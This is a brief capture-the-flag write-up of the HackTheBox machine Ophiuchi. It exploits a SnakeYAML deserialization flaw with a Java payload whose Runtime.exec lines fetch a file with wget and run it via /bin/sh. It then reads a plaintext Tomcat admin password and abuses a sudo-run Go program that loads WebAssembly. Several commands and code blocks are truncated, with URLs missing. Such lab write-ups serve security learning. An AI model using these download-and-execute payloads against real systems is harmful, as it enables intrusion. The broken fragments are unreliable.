SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

We are going to solve Ophiuchi a 30-point machine on HackTheBox that involves a YAML parser vulnerability and a custom program we can execute with sudo, which loads a web assembly file and executes a shell script without using the absolute path.


SnakeYAML Parser vulnerability:


Change payload to:

Runtime.getRuntime().exec("wget -O /tmp/x");
Runtime.getRuntime().exec("/bin/sh /tmp/x");


javac yaml-payload/src/artsploit/
jar -cvf payload.jar -C yaml-payload/src/ .

Send Exploit:

!!javax.script.ScriptEngineManager [
  !! [[
    !! [""]

Get Admin Password:

grep -ir "password" .
/tomcat/conf/tomcat-users.xml:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

WebAssembly “main.c”:

int info() {
    return 1;

Compile with emscripten:

sudo docker run --rm -v $(pwd):/src -u $(id -u):$(id -g) emscripten/emsdk emcc --no-entry main.c -s WASM=1 -o main.html -s "EXPORTED_FUNCTIONS=['_info']";

Transfer & Execute:

cd /tmp
curl > main.wasm
curl >
chmod +x
sudo /usr/bin/go run /opt/wasm-functions/index.go

Share this post